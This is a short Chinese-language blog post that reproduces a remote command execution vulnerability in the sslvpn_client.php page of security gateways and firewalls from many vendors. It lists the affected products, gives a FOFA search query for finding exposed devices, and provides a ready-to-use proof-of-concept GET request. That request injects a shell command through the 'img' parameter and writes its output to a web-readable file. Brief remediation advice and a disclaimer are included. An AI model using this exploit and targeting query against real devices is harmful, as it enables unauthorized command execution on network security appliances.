本文主要是介绍多个安全厂商安全设备 远程命令执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、影响范围
目前已知的存在该漏洞的产品:
H3C-下一代防火墙
安全信息-明御安全网关
MAIPU-安全网关
D-Link-下一代防火墙
Huawei-产品
迈普通信技术股份有限公司安全网关
博达通信-下一代防火墙
任天行网络安全管理系统/安全审计系统
安博通应用网关
烽火网络安全审计
瑞斯康达科技发展股份有限公司安全路由器
任子行网络安全审计系统
绿盟安全审计系统
深圳市鑫塔科技有限公司第二代防火墙
海康威视安全网关
优炫防火墙
SG-8000深度安全网关
网御星云上网行为管理系统
360上网行为审计系统
二、漏洞描述
该漏洞可执行远程代码
三、复现环境
FOFA:body=“/webui/images/default/default/alert_close.jpg”
四、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC
GET /sslvpn/sslvpn_client.php?client=logoImg&img=y%20|echo%20%60pwd%60%20|tee%20/usr/local/webui/sslvpn/check.txt HTTP/1.1
Host: IP-port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
3.访问http://ip:port/sslvpn/check.txt,成功
五、修复建议
1.过滤请求url中的敏感字符
2.暂时将sslvpn_client.php文件删除
3.关注厂家漏洞修复信息,及时更新
参考链接
https://mp.weixin.qq.com/s/ZzZZdlOpUuWzwR0HSCfuPA
这篇关于多个安全厂商安全设备 远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!